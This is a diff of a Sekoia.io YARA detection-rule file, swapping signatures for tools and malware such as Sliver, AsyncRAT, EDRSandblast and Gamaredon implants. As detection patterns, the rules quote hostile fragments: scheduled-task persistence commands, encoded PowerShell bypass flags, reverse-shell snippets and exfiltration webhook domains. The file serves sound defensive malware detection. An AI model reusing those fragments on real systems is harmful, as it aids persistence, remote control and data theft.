-		$a1 = "github.com/bishopfox/sliver/implant/sliver/"
+		$ = "rm -f /dev/shm/sem*%s"
+		$ = "/etc/ld.so.preload"
+		$ = "kill -9 %d 2>/dev/null"
+		$ = "/,1d' %s 2>/dev/null"
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and filesize < 11MB and filesize > 8MB and #a1 > 200
+		uint32be( 0 ) == 0x7F454C46 and filesize < 500KB and all of them
 }
-rule SEKOIA_Tool_Godpotato : FILE
+rule SEKOIA_Loader_Win_Erbium : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detect the Erbium loader based on specific user-agent and URI"
 		author = "Sekoia.io"
-		id = "cc396771-f187-43ae-903f-147d15483c46"
-		date = "2023-08-23"
+		id = "d1e5be62-5677-4ef4-9f10-65baf36ab619"
+		date = "2022-09-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_godpotato.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_erbium.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ea182b187fcd1ba61d3e2d10a689cf0212267dede1342e817e47551506a780ab"
+		logic_hash = "e93e9dbf0e5412afa4640b4cf5d94374c4df38f8044d44c375e86508c0d4190a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246174,29 +246073,26 @@ rule SEKOIA_Tool_Godpotato : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "[!] Cannot create process Win32Error:{0}" ascii wide
-		$s2 = "[*] process start with pid {0}" ascii wide
-		$s3 = "MEOW" ascii wide
-		$s4 = "2ae886c3-3272-40be-8d3c-ebaede9e61e1" ascii wide
-		$s5 = "GodPotatoUnmarshalTrigger" ascii wide
-		$s6 = "GodPotato.exe" ascii wide
-		$s7 = "GodPotato.exe" wide
+		$str01 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36" wide
+		$str02 = "cloud/getHost.php?method=getstub&bid=" wide
+		$str03 = "api.php?method=getstub&bid=" wide
+		$api = "WinHttp" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
+		uint16( 0 ) == 0x5A4D and 2 of ( $str* ) and #api > 6
 }
-rule SEKOIA_Apt_Kimsuky_Vbs_Powershell_Downloader : FILE
+rule SEKOIA_Tool_Edrsandblast_Cli_Strings : FILE
 {
 	meta:
-		description = "Detects VBS/Powershell Downloader used by Kimsuky"
+		description = "Detects EDRSandblast CLI strings"
 		author = "Sekoia.io"
-		id = "4c9af11f-802b-4ffe-9783-90fc2ee53809"
-		date = "2022-08-30"
+		id = "baf3c68a-1d28-464e-8240-28cc66c8c151"
+		date = "2024-01-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_vbs_powershell_downloader.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_edrsandblast_cli_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "dc24ca206a3122b34be978287f907b12c809f76058fe9355bbd00b3159b0a4d4"
+		logic_hash = "dd6b3836b2f368c8d0ed06770f2469ef70d850ae1a9da26c7835f1877379efe9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246204,54 +246100,54 @@ rule SEKOIA_Apt_Kimsuky_Vbs_Powershell_Downloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "& WScript.ScriptFullName &" ascii fullword
-		$ = "/c schtasks /create /sc minute /mo 5 /tn"
-		$ = "pOwErsHeLl -ep bypass -encodedCommand"
+		$ = "[!] LSASS dump might fail if RunAsPPL" wide
+		$ = "[!] You did not provide at least one option between" wide
+		$ = "[+] Detecting userland hooks in all loaded DLLs" wide
+		$ = "[+] Saving them to the CSV file" wide
 
 	condition:
-		filesize < 200KB and 2 of them
+		uint16be( 0 ) == 0x4d5a and 4 of them
 }
-rule SEKOIA_Loader_Win_Konni_Wpnprv : FILE
+rule SEKOIA_Apt_Gamaredon_Powerrevshell : FILE
 {
 	meta:
-		description = "Detect the wpnprv DLLs used for KONNI for UAC bypass"
+		description = "Detects Powershell reverse shell"
 		author = "Sekoia.io"
-		id = "02162533-4ace-42bf-8df0-38b140487f01"
-		date = "2023-09-26"
+		id = "b5161c23-c607-4096-9f4a-1be516a0a614"
+		date = "2023-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_konni_wpnprv.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_powerrevshell.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "32178c97795aeead9c186e0b7fb508376045acb7534e6ce9e617c06fd399c3da"
+		logic_hash = "fc5abcdf47641c1e7978cf076550f38987305bb2171b3e65f7865102a065af43"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "wpnprv.dll"
-		$ = "IIIIIIII" fullword
-		$ = "wusa.exe" wide
-		$ = "winver.exe" wide
-		$ = "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" wide
-		$ = "taskmgr.exe" wide
+		$ = "iex $enc.GetString("
+		$ = "$stream.Write"
+		$ = ".).FullName"
+		$ = "Sockets.TcpClient"
+		$ = "\">\";"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them and filesize < 3000
 }
-rule SEKOIA_Generic_Bat_Script_Mock_Http_Services : FILE
+rule SEKOIA_Apt_Mustangpanda_Malicious_Lnk_Worm : FILE
 {
 	meta:
-		description = "Generic rule detecting BAT script using mock HTTP services (used by APT28)"
+		description = "Detects MustangPanda infected ThumbDrive"
 		author = "Sekoia.io"
-		id = "1cfbe5ba-6304-476d-8308-928100a85c16"
-		date = "2023-09-07"
+		id = "e7cc5ecc-2369-49ff-9e35-c9faeb69acda"
+		date = "2023-09-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_bat_script_mock_http_services.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_malicious_lnk_worm.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d34be59cfb054895381580e7852bba6b899cfb680882b7fd24a72438131c3bee"
+		logic_hash = "ca19a925af695cbbb41fdfbb161dceafeb8aae6d42000cc09bb07e1dbdfdb9e5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246259,57 +246155,53 @@ rule SEKOIA_Generic_Bat_Script_Mock_Http_Services : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$bat1 = "@echo off"
-		$bat2 = "chcp 65001"
-		$ps1 = "WebClient"
-		$ps2 = "UploadString"
-		$dom1 = "mockbin.org"
-		$dom2 = "webhook.site"
-		$dom3 = "mocky.io"
-		$dom4 = "pipedream.com"
+		$s1 = "RECYCLER.BIN\\1\\CEFHelper.exe" wide
 
 	condition:
-		(1 of ( $bat* ) or 1 of ( $ps* ) ) and 1 of ( $dom* ) and filesize < 2000
+		uint32be( 0 ) == 0x4C000000 and 1 of them
 }
-rule SEKOIA_Apt_Toddycat_Waexp_Strings : FILE
+rule SEKOIA_Xworm_Dotnet_Injector
 {
 	meta:
-		description = "Detects WAExp based on strings"
+		description = ".NET injector used by XWorm TA"
 		author = "Sekoia.io"
-		id = "1bbb3e81-14a9-4bda-b647-b6f5255e9a16"
-		date = "2024-04-23"
+		id = "50581a9d-afc3-43da-9e34-3a553cbd01b4"
+		date = "2022-12-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toddycat_waexp_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/xworm_dotnet_injector.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4377183b326329fb14ae3911fbb1e29cde220d7b247d048fba4bbbda9de8938d"
+		logic_hash = "4777edacf4719e602ae1fb7204ea97cd594277faa1c2b7ad430066ad82b40768"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[>] Profile:" wide ascii
-		$ = "[+] All Done" wide ascii
-		$ = "[+] Files:" wide ascii
+		$first_payload = "jBGIcSr2fKhj1ZT2YNLBTcYYeAw/vWUT98dCA/H6hpI+dY+lkoSe1ATx7XEIXKtAdTSwl1PKhNROoxstXsnsHTZbS2ikRLv6lmHd5v09DltsPeXIOA789wZC8qR1OScJFohGxuWQSQ8K2TAFUQAntIFdX+Om1QZUARdDnb4f+P8VFucU9avWD75yK1IcTDDDEYwvm/rwUYTqWitcrfIY+aFcgQwyvEzkN7Pbsah4Kts+XmK0C3TzlnDd2mz6TdsPphGbBxcbBdZGMTyzunZUEKRYea7xM6u+az9v7m6a1G6vhsSqz4C/nleDmzL2dIVnVR6Ni6+0hlExcP" wide
+		$rijndael_key1 = { e5 a0 b1 e8 89 be e8 8e 8e e4 bb a3 e5 ba b5 e9 85 8d e7 89 b9 e6 b0 8f e5 85 8b e9 9b 99 e8 89 be e5 8b 92 e6 8b 89 e6 a1 83 e9 ad 9a e6 88 91 e6 96 af e6 a1 83 e5 ba 95 e5 be b7 }
+		$rijndael_key2 = { e7 9b 9f e7 91 aa e6 a1 83 e9 87 91 e5 90 89 e9 97 95 e5 a0 b1 e9 9b 99 e9 97 95 e5 96 ac e5 ba 95 e5 a0 b1 e5 be b7 e6 8b 89 e5 92 8c e7 a0 b4 e7 88 be e9 a6 ac e6 88 91 e5 8a a0 }
+		$rijndael_key3 = { e6 9b b2 e6 b0 8f e5 ba b5 e5 a3 ab e9 97 95 e5 be b7 e6 96 af e8 9b 8b }
+		$s1 = "fullofdick"
+		$s2 = "holdmeback"
+		$s3 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them and filesize < 1MB
+		($first_payload and all of ( $rijndael_key* ) ) or 2 of ( $s* )
 }
-
-rule SEKOIA_Rootkit_Win_Purplefox_Kernel_Driver : FILE
+rule SEKOIA_Apt_Ta410_Flowcloud_Loader : FILE
 {
 	meta:
-		description = "Detect the Purple Fox trojan"
+		description = "Detects FlowCloud Loader"
 		author = "Sekoia.io"
-		id = "798dc20b-76cd-4e31-b9ee-f363fb39cd58"
-		date = "2022-03-28"
+		id = "0a11dfa0-5a59-477b-baf6-6a777d020860"
+		date = "2024-05-27"
 		modified = "2024-12-19"
-		reference = "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_win_purplefox_kernel_driver.yar#L3-L35"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ta410_flowcloud_loader.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "91d7caca7c0c41e70813d52b5662bf0238d078fca519bfc2c03f3f87fe3805b8"
+		logic_hash = "450cfdfbd9a42b623fc1acb55f3ea309ae54282b480edcb9495f4d45874d3922"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246317,60 +246209,58 @@ rule SEKOIA_Rootkit_Win_Purplefox_Kernel_Driver : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\DosDevices\\Global\\MyDriver" wide
-		$ = "IOCTL_IO_KILL_PROCESS" ascii
-		$ = "IOCTL_IO_DELET_FILE" ascii
-		$ = "IOCTL_IO_COPY_FILE" ascii
-		$ = "IOCTL_IO_KILL_MINIFITER" ascii
+		$decryption_function = {8A C8 80 C1 26 32 D1 30 14 38}
+		$derivation_key = {6B 04 00 00 F7 ?? 81 c2 a8 01 00 00}
+		$new_pattern_1 = {50 33 c0 58 74 01 e8}
+		$new_pattern_2 = {89 44 24 fc 58 8D 64
+        24 fc 81 fc 00 10 00
+        00 77 06 81 c4 ?? ??
+        ?? ?? 8B 44 24 FC}
+		$patch_bytes = {68 78 56 34 12 C3 90 90 90 90 90 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them or ( pe.rich_signature.toolid ( 171 , 30319 ) and pe.rich_signature.toolid ( 158 , 30319 ) and pe.rich_signature.toolid ( 170 , 30319 ) and pe.rich_signature.toolid ( 147 , 30729 ) and pe.rich_signature.toolid ( 1 , 0 ) ) and for any i in ( 0 .. pe.number_of_signatures -1 ) : ( pe.signatures [ i ] . thumbprint == "c7939f8303ca22effb28246e970b13bee6cb8043" )
+		uint16be( 0 ) == 0x4d5a and filesize < 4MB and 2 of them
 }
-rule SEKOIA_Apt_Apt29_Quarterrig
+rule SEKOIA_Hacktool_Duplicatedump_Strings : FILE
 {
 	meta:
-		description = "Detects QUARTERRIG"
+		description = "Detects Duplicate Dump"
 		author = "Sekoia.io"
-		id = "e370ed7e-5e12-4add-95f3-3773ea8e2d03"
-		date = "2023-04-19"
+		id = "081d0124-4afe-418b-9767-3d987c0107ca"
+		date = "2023-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt29_quarterrig.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_duplicatedump_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9628418789a9bc24c7e44dbc9106ffa6316aefebe33b91c749b54cb5462b1309"
+		logic_hash = "feff083ed432781884941fc02eee6d6ce54f70f1b85d24db2f3e1d0147a81a7a"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str_dll_name = "hijacker.dll"
-		$str_import_name = "VCRUNTIME140.dll"
-		$op_resolve_and_call_openthread = { 48 [6] 48 [6] 8B D8 E8 [4] [3] 33 D2 B9 FF FF 1F 00 FF D0 }
-		$op_resolve_and_call_suspendthread = { E8 [4] 48 8B CB FF D0 83 F8 FF }
+		$ = "7d872e921a4b4b1b8b295395099b0209" wide ascii
+		$ = "[+] Named pipe connected and replying with current PID" wide ascii
+		$ = "[X] Named pipe connection error:" wide ascii
+		$ = "[X] Error occur while compressing file:" wide ascii
+		$ = "[+] Dump file saved to" wide ascii
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 4 of them
 }
-rule SEKOIA_Apt_Lazarus_Pondrat : FILE
+rule SEKOIA_Rat_Win_Asyncrat : FILE
 {
 	meta:
-		description = "Detects PondRAT via mangled command names"
+		description = "Detect AsyncRAT based on specific strings"
 		author = "Sekoia.io"
-		id = "a957c158-a79a-4d7a-8473-b6960cf02d9b"
-		date = "2024-09-23"
+		id = "d698e4a1-77ff-4cd7-acb3-27fb16168ceb"
+		date = "2023-01-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_pondrat.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_asyncrat.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "b62c912de846e743effdf7e5654a7605"
-		hash = "61d7b2c7814971e5323ec67b3a3d7f45"
-		hash = "ce35c935dcc9d55b2c79945bac77dc8e"
-		hash = "f50c83a4147b86cdb20cc1fbae458865"
-		hash = "05957d98a75c04597649295dc846682d"
-		hash = "33c9a47debdb07824c6c51e13740bdfe"
-		logic_hash = "49c5f635e3873a145479bb164838043921d012eef7dc8ad6373c43c8cf1f14e0"
+		logic_hash = "5e35b034ba1761fae780429be377b70ae8ce62273670042ff067c38ed8bb5a9e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246378,26 +246268,34 @@ rule SEKOIA_Apt_Lazarus_Pondrat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$cmd_PondRAT1 = "_Z7MsgDownP11_TRANS_INFO" ascii
-		$cmd_PondRAT2 = "_Z5MsgUpP11_TRANS_INFO" ascii
-		$cmd_PondRAT3 = "_Z6MsgRunP11_TRANS_INFO" ascii
-		$cmd_PondRAT4 = "_Z6MsgCmdP11_TRANS_INFO" ascii
+		$str01 = "get_ActivatePong" ascii
+		$str02 = "get_SslClient" ascii
+		$str03 = "get_TcpClient" ascii
+		$str04 = "get_SendSync" ascii
+		$str05 = "get_IsConnected" ascii
+		$str06 = "set_UseShellExecute" ascii
+		$str07 = "Pastebin" wide
+		$str08 = "Select * from AntivirusProduct" wide
+		$str09 = "Stub.exe" wide
+		$str10 = "timeout 3 > NUL" wide
+		$str11 = "/c schtasks /create /f /sc onlogon /rl highest /tn " wide
+		$str12 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
 
 	condition:
-		3 of them and filesize < 4MB
+		uint16( 0 ) == 0x5A4D and 9 of them
 }
-rule SEKOIA_Apt_Evasive_Panda_Downloader_Certificate_Exe : FILE
+rule SEKOIA_Apt_Gamaredon_Flash_Infostealer : FILE
 {
 	meta:
-		description = "Detects downloader used by Evasive Panda (certificate.exe)"
+		description = "Detects the Gamaredon's Flash InfoStealer"
 		author = "Sekoia.io"
-		id = "1b40fca9-04b1-46b3-b48c-5a148a1b36b9"
-		date = "2024-03-15"
+		id = "f060fe4b-74fd-4ef3-ac86-916e2113ff24"
+		date = "2023-01-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_evasive_panda_downloader_certificate_exe.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_flash_infostealer.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "38115b463378f58035a0ef0536a6af4adbec7c275164758d312e95300670b695"
+		logic_hash = "5a3ee8c2c3c377bea7de1993e5ef744796130643575bcce1b6181d68190aafb7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246405,25 +246303,28 @@ rule SEKOIA_Apt_Evasive_Panda_Downloader_Certificate_Exe : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {C6 45 D4 44 C6 45 D5 74 C6 45 D6 7C C6 45 D7 74 C6 45 D8 79}
+		$a1 = "Content-Type: multipart/form-data; boundary=----%s" ascii
+		$a2 = "Content-Disposition: form-data; name=\"p\"" ascii
+		$a3 = "Content-Type: application/octet-stream"
+		$w1 = "%s||%s||%s||%s" wide
+		$w2 = "Pragma: no-cache" wide
+		$w3 = { 64 00 6F 00 63 00 00 00 00 00 2E 00 64 00 6F 00 63 00 78 00 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 2 of ( $a* ) and 2 of ( $w* )
 }
-rule SEKOIA_Malware_Swordldr : FILE
+rule SEKOIA_Apt_Scanbox_Framework_Not_Obfuscated : FILE
 {
 	meta:
-		description = "Detects Swordldr. Maybe chunk_1 is too restrictive"
+		description = "Detects the non obfuscated version of ScanBox"
 		author = "Sekoia.io"
-		id = "4068c007-50f4-4913-a352-4a40dd4e452b"
-		date = "2024-09-25"
+		id = "4790f122-89de-4f7b-a25f-9ac7b1af8333"
+		date = "2022-09-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_swordldr.yar#L1-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_scanbox_framework_not_obfuscated.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "d0cc758082e303275cbb8cd6b2048eff"
-		hash = "7aa57da44718cd88f7d37b33a5d3ad74"
-		logic_hash = "9e408181b9122925c0ff9efdaed688e659596b58b9108c0f280d9bc1624d73cb"
+		logic_hash = "52779571eb4e68442542a1c4cff58d5b00a264bb567396126cd93dc4ec4eda45"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246431,122 +246332,122 @@ rule SEKOIA_Malware_Swordldr : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { CC CC CC CC B0 01 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 02 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 03 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 04 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 05 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 06 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 07 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 08 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 09 C3 CC CC CC CC }
-		$chunk_1 = {
-        48 63 44 24 40 44 8B 44 86 04 48 63 44 24 40 45 23 ?? 45 03 C0 8B 54 86 04 48 63 44 24 40 41 2B D0 41 03 ?? 89 54 86 04
-        }
+		$ = "php?m=a&data="
+		$ = "php?m=p&data="
+		$ = ".fun.split_data = function"
+		$ = ".php?data="
+		$ = ".php?m=b"
+		$ = "basic.apipath"
+		$ = ".info.seed ="
+		$ = "loadjs ="
+		$ = "info.color = screen.colorDepth"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and #chunk_1 > 5
+		5 of them and filesize < 500KB
 }
-rule SEKOIA_Apt_Reaper_2Fa_Phishing_Webpage
+rule SEKOIA_Malware_Venom_Admin_Strings : FILE
 {
 	meta:
-		description = "Detects Reaper 2FA phishing webpage"
+		description = "Detects Venom admin strings"
 		author = "Sekoia.io"
-		id = "348ca2ad-c8f9-4aed-8a27-95caa3a34f4b"
-		date = "2023-03-09"
+		id = "4929340c-310b-4c59-a111-23409f973d22"
+		date = "2022-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_reaper_2fa_phishing_webpage.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_venom_admin_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3f0ae0b35ea181b4712feeb34e866519921917179297148982e5298df9f133a9"
+		logic_hash = "205f16b07f58290b2898de7a7dd1e20f3d7651d738f0b15bf810f9be66eedf3d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "setTimeout(checkUpload,"
-		$ = "commChannel.addListener("
-		$ = "else if(commType =="
-		$ = "?dir=DOWN&method=READ&id="
-		$ = "Content : base64_encode(upload_data)"
-		$ = "$.post(upHttpRelayer"
-		$ = "var ablyUpData = {"
-		$ = "initComm();"
-		$ = "function Next(arg) {"
+		$ = "/admin/admin.go"
+		$ = "/cli/interactive.go"
+		$ = "/cli/cli.go"
+		$ = "/dispather/sender.go"
+		$ = "/dispather/proxy.go"
+		$ = "/dispather/handler.go"
+		$ = "/dispather/forward.go"
+		$ = "/utils/reuse_port.go"
 
 	condition:
-		3 of them
+		filesize < 11MB and 6 of them
 }
-rule SEKOIA_Apt_Aptc60_Downloader_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Getlogicaldrive_Hunting : FILE
 {
 	meta:
-		description = "Detects a simple downloader abusing wlrmdr.exe and used by APT-C-60"
+		description = "Detects gamaredon powershell stuff"
 		author = "Sekoia.io"
-		id = "02fd6d5b-7211-46cc-bcff-ab5d78e459c0"
-		date = "2024-09-05"
+		id = "18958ee8-7eb8-43b5-8ad2-be93bb39aa80"
+		date = "2023-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aptc60_downloader_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_getlogicaldrive_hunting.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "b14ef85a60ac71c669cc960bdf580144"
-		logic_hash = "f05480834e6d91a852a190a2ecec05aaea1affa8a605a56c80962a9fbfc8f0c0"
-		score = 75
-		quality = 80
+		logic_hash = "4ec19e4d5723bc33d6f11598ce538403678e906bc416b58fea6e1b10cd26e5b6"
+		score = 50
+		quality = 60
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "mydllmain" fullword
-		$ = "-s 3600 -f 0 -t _ -m _ -a 11 -u" wide
-		$ = "WlrMakeService" wide
-		$ = "Trigger1" wide
+		$ = "VolumeSerialNumber" ascii wide nocase
+		$ = "Get-WmiObject" ascii wide nocase
+		$ = "]::ToUInt32(" ascii wide nocase
+		$ = "DeviceID" ascii wide nocase
+		$ = "UploadValues" ascii wide nocase
+		$ = "UploadString" ascii wide nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 500KB
+		5 of them and filesize < 500KB
 }
-rule SEKOIA_Apt_Oilrig_Powerexchange : FILE
+
+rule SEKOIA_Backdoor_Win_Minibike : FILE
 {
 	meta:
-		description = "Detects OilRig's PowerExchange backdoor"
+		description = "Detect the MINIBIKE malware"
 		author = "Sekoia.io"
-		id = "cb6b370f-7b05-480b-865e-ac81ded4a2a4"
-		date = "2023-10-24"
+		id = "d758c41a-279c-4706-9cf3-87740e45f71d"
+		date = "2024-04-08"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_powerexchange.yar#L1-L19"
+		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_minibike.yar#L4-L37"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5e505e9bbb17500f7e9a316b66bccb62089172582478230e0bda736bbefa1fd6"
+		logic_hash = "d09ab10aff629c6edafa7df640e98bcb6b2523a9bf4e2f2ca87f6694ccfe21bf"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "985967e245d8fbc722e30371c9ed48c3269ceaa6b9b9b80caf2b95c920c856c2"
+		hash2 = "ab0b602665b609392eacdcbfc6c1981f216c19f21e2156a55cf9998eab02227b"
